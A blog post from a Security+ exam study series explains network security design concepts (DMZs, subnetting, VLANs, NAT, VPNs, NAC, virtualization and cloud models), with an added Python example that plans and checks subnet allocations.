Security+ Series Part 3: Network Security Design

In this part of the Security+ series we are going to dive into design best practices. You may already be familiar with some of the terms from previous posts, so we are going to build on top of those. The exam version SY0-401 also touches on cloud computing concepts, so I made sure to include those as well.

DMZ

A Demilitarized Zone has its origins in the military and describes a neutral area between two fighting parties. The same concept is used in computer networking, where this area holds services that are accessible both from the Internet and from the intranet. You can further divide the DMZ into sub-DMZs: for example, a web proxy appliance can be in one zone and your e-commerce servers in a different zone. Each zone can have its own policies. DMZs are typically connected to a firewall which enforces these policies; the important rule is that a host in the DMZ must not be allowed to initiate connections into the internal network, so a compromised web server cannot pivot inside. Inside a DMZ you can use other security technologies for further isolation, for example Private VLANs.

DMZ between North Korea and South Korea.

Subnetting

Subnetting is easy like the Jackson Five's ABC. Definitely one of the favorite topics in CCNA Routing and Switching or CompTIA's Network+. What subnetting does is break a large address block into smaller, more manageable pieces. For example, you could use the private address space 10.0.0.0/8 for your company and start to divide it into subnets: one block, used for the data center (a.k.a. Willy Wonka's data factory), would receive 10.0.0.0/16, your regions would get 10.1.0.0/17 and 10.1.128.0/17, and so forth. The key here is to plan ahead, otherwise you will have a mess in your IP address management (IPAM).
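The address plan above, carved programmatically, as an added example (not the post's code) using Python's standard-library ipaddress module. It reproduces the post's own allocations (a /16 for the data center, two /17 regions), adds a made-up guest Wi-Fi /22 to show what happens to the leftover space, and includes the overlap check an IPAM should run before every assignment; the allocator's tightest-fit policy and the assignment names are this example's assumptions.

```python
"""Carving an address plan out of 10.0.0.0/8 with the standard-library
ipaddress module, plus the overlap check an IPAM should run before every
new assignment. Added example, not from the original post; the allocations
reproduce the post's own plan (/16 for the data center, two /17 regions)."""
import ipaddress
from typing import Dict, List, Optional, Tuple

Net = ipaddress.IPv4Network


def allocate(pool: str, requests: List[Tuple[str, int]]) -> Dict[str, Net]:
    """Tightest-fit allocator: each request (name, prefix length) gets the lowest
    block of that size out of the smallest free block that can hold it."""
    free: List[Net] = [ipaddress.ip_network(pool)]
    plan: Dict[str, Net] = {}
    for name, prefix in requests:
        candidates = [n for n in free if n.prefixlen <= prefix]
        if not candidates:
            raise ValueError(f"no free /{prefix} left for {name}")
        # Smallest block wins; on ties take the lowest address.
        parent = max(candidates, key=lambda n: (n.prefixlen, -int(n.network_address)))
        block = next(parent.subnets(new_prefix=prefix))
        free.remove(parent)
        free.extend(parent.address_exclude(block))   # hand the remainder back
        plan[name] = block
    return plan


def overlaps(plan: Dict[str, Net]) -> List[Tuple[str, str]]:
    """Every pair of assignments that overlap; a clean plan returns []."""
    names = sorted(plan)
    return [(a, b) for i, a in enumerate(names) for b in names[i + 1:]
            if plan[a].overlaps(plan[b])]


def locate(plan: Dict[str, Net], address: str) -> Optional[str]:
    """Which assignment does a host address fall into (longest prefix match)?"""
    host = ipaddress.ip_address(address)
    hits = [(n.prefixlen, name) for name, n in plan.items() if host in n]
    return max(hits)[1] if hits else None


if __name__ == "__main__":
    plan = allocate("10.0.0.0/8", [("datacenter", 16), ("region-east", 17),
                                   ("region-west", 17), ("guest-wifi", 22)])
    for name, net in plan.items():
        print(f"{name:12} {net}  ({net.num_addresses - 2} usable hosts)")
    print("overlaps:", overlaps(plan))
    print("10.1.200.7 belongs to", locate(plan, "10.1.200.7"))
```

Because the allocator always returns the unused remainder to the free list, the /17 regions end up next to each other inside 10.1.0.0/16 exactly as in the text, and later requests are placed without fragmenting the /8 further than necessary. The overlap check is the part to keep around: an assignment that overlaps an existing one is the usual root cause of "my route points the wrong way" tickets.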

Subnetting is like dividing a cake.

VLAN/PVLAN

Virtual Local Area Networks have been around for many years. They are so obvious that no one really thinks about them as a virtualization technology, but in fact they are. A VLAN is the equivalent of a broadcast domain; it provides separation at Layer 2. VLANs became popular after we started to push a lot of different types of traffic onto our networks, so not only data but also voice and video traffic was riding on our switch links. To communicate between VLANs we need a Layer 3 device; a multilayer switch, a router or even a firewall will do.

The concept of the VLAN was later extended with a feature that protects users in the same VLAN from each other. The idea is useful, for example, in hotels, where all guests sit in the same VLAN but you need to ensure that they cannot talk to each other directly. The extension is called Private VLAN.

NAT

We already briefly touched on NAT in the previous post. NAT was invented to slow down the depletion of the IPv4 address space. Since IPv4 addresses are "only" 32 bits long, there is a finite number of hosts that can access the public Internet. The idea is that inside our organization we use a private address range, like 10.0.0.0/8, but when we want to access a resource on the Internet we translate our source address into a public one assigned by the service provider. Since many organizations have thousands of hosts inside and just a few public IPs, we need to do port multiplexing or overloading. This feature is called Port Address Translation (PAT). NAT/PAT is also used when companies merge and have overlapping address space. Note that NAT is not a security control by itself; an explicit firewall policy is still needed.

Remote Access

The Internet is fundamentally changing the way we communicate. One of the features that many companies use is remote access. The idea here is that an employee or partner connected to the Internet creates a secure tunnel to our corporate network. All communication within this tunnel is encrypted. IPsec is one of the famous protocol stacks used for this purpose; it contains many different pieces to make this happen. There are, however, other technologies that simplify the configuration of tunnels, namely SSL/TLS VPNs. We will dig deeper into this area later in the series.

These guys are stuck at the airport. They could get some VPN magic rolling to get the job done.

Telephony

Since voice services joined data on the same transport network, we must also take care to protect this type of communication. Fundamentally, it is a good idea to put IP phones in a separate voice VLAN and harden it with the protections we mentioned previously. Optionally, encryption (SRTP for the media, TLS for the signaling) can be used to prevent eavesdropping. QoS is also essential to protect these little voice fellas in transit against DoS. On the control plane side, call processing servers and voice mail servers need the right level of security too.

Get this retro IP Phone and people will be like Whaaaat?!

NAC

Network Admission Control (Cisco's name; generically Network Access Control) is a feature that allows you to check the security posture of a host that is trying to access the network. For example, it will only allow access if the OS security patches are current, malware protection is enabled, a host intrusion prevention system is active, the disk is encrypted and so on. If that is not true, it can move the client to a remediation VLAN where it can receive all the patches.

Lucky enough, NAC deals with computers.

Virtualization

Oh boy, this is a BIG one on my list. Server virtualization fundamentally changed the way we utilize hardware resources. In the past, we had a model where one business app would ride on an OS and that OS would be installed directly on a physical machine. It was a cumbersome, slow process. Just think how long you would wait for the hardware itself.

Virtualization introduces a new layer between the hardware and the operating system. This layer is referred to as the hypervisor. The hypervisor abstracts the physical resources underneath, so we can now run many Virtual Machines – VMs on a single server. And that was just the beginning: we can take a pool of physical servers and cluster them, so if any of them fails we move the workload somewhere else.

Imagine that you could do the same with networking. Stay tuned for the NSX series, you will love it.

The picture says it all.

Cloud Computing

And the winner of the 2013/2014 buzzword award is… Cloud Computing. This is one of the most abused terms out there. What marketing departments did with it is beyond imagination.

To bring some value back to this term: cloud is not really new, it has been around for many years, just nobody called it that. Essentially, a cloud is a resource located somewhere else. So even Willy Wonka’s traditional data factory can be a cloud with some additional services such as Pay As You Go, or utility-based computing – the same model electric energy, water or gas has today.

See. They measure your actual usage. How clever.

SaaS

The Software as a Service term was born when companies such as Google, Amazon, and Microsoft started to offer traditional software as a…service. You got it! The main point is that you do not own or maintain the hardware or operating systems these run on, you just use the app. Examples include Office 365, SalesForce, Gmail, even WordPress is a SaaS.

MaaS

This one made me laugh, as you can offer almost anything as a service. So Monitoring as a Service was born. For example, Cisco offers a cloud-managed wireless solution called Meraki. They will ship you a bunch of lightweight access points, and these will be managed from a controller sitting in their data center.

Cisco Meraki Access Points. Thumbs up for clean design.

PaaS

Moving one layer below SaaS, you find Platform as a Service. In this model, the provider gives you hardware and an operating system, and perhaps a development environment. Out there in the wild, some known PaaS providers are Google App Engine, Amazon Elastic Beanstalk, Microsoft Azure and HP Cloud. The number is growing.

IaaS

Infrastructure as a Service moves another layer below. The provider supplies the hardware and the hypervisor. It is up to you to build and spin up virtual machines on top of them. This is very extensible: you can use predefined virtual machines from a marketplace, or you can build application blueprints and create entire application stacks very quickly. One such example is the SharePoint Reference Architecture. The list of providers includes major players – Google, Amazon, Microsoft, VMware, HP, Rackspace and many more.

Cloud Ownership

Depending on implementation and ownership, you can choose between various cloud models:

  • Private – built in house; you manage the hardware, hypervisor, OS and applications
  • Public – resources rented from a cloud provider; responsibilities depend on the type (SaaS, PaaS, IaaS)
  • Hybrid – a combination of the two above
  • Community – multiple internal customers using the same platform, for example government agencies

Who has the keys to your kingdom?

Defense in Depth

Defense in depth is a concept where you implement security mechanisms at multiple places: starting at the user level with training, then moving to host security, switch security, firewall security and so on. This approach decreases the likelihood of being compromised.

With defense in depth our network is like a fortress.

And with that, my friends, we are at the end of this part of the series. I hope you enjoyed it and learned something new. See you in the next part, which will spin around Protocols and Ports.